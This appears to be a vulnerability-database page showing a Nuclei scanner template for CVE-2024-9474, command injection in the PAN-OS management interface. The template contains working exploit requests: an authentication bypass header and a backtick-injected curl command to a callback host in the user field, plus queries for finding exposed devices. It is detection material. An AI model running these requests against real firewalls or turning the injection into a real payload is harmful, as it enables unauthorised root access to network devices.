Vulners
Lucene search
PAN-OS Management Web Interface - Command Injection
10
id: CVE-2024-9474
info:
name: PAN-OS Management Web Interface - Command Injection
author: watchTowr,iamnoooob,rootxharsh,pdresearch
severity: high
description: |
A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.
Cloud NGFW and Prisma Access are not impacted by this vulnerability.
impact: |
Authenticated administrators with access to the management web interface can escalate privileges to execute commands with root privileges on the PAN-OS firewall, achieving complete system control and bypassing security controls.
remediation: |
Apply security updates from Palo Alto Networks to address the privilege escalation and command injection vulnerability in the PAN-OS management web interface.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2024-9474
cwe-id: CWE-78
epss-score: 0.94766
epss-percentile: 0.99848
cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: paloaltonetworks
product: pan-os
shodan-query:
- cpe:"cpe:2.3:o:paloaltonetworks:pan-os"
- http.favicon.hash:"-631559155"
fofa-query: icon_hash="-631559155"
tags: cve,cve2024,panos,rce,kev,vkev,vuln
flow: http(1) && http(2) && http(3)
variables:
rand: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
GET /php/utils/CmsGetDeviceSoftwareVersion.php/.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "0.0.0")'
- 'contains_all(header, "Expires: 0", "PHPSESSID=", "application/json")'
condition: and
internal: true
- raw:
- |
POST /php/utils/createRemoteAppwebSession.php/{{rand}}.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
user=`curl+{{interactsh-url}}`&userRole=superuser&remoteHost=&vsys=vsys1
matchers:
- type: word
part: body
words:
- "@start@PHPSESSID="
internal: true
extractors:
- type: regex
part: body
name: phpsessid
group: 1
regex:
- '@start@PHPSESSID=(.*?)@end@'
internal: true
- raw:
- |
GET /index.php/.js.map HTTP/1.1
Host: {{Hostname}}
Cookie: PHPSESSID={{phpsessid}}
X-PAN-AUTHCHECK: off
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "dns")'
- 'contains(body, "panos")'
condition: and
# digest: 490a0046304402204f52c4db56d50d71ced144a3b795cd9ddce125a6594fe085bb79c7f602cbd115022054ad8c7d940c966a758670806cbc751e2938afedeece7102d4ba732514d2b17b:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
8.3High risk
Vulners AI Score8.3
CVSS 3.17.2
CVSS 46.9
EPSS0.94766
SSVC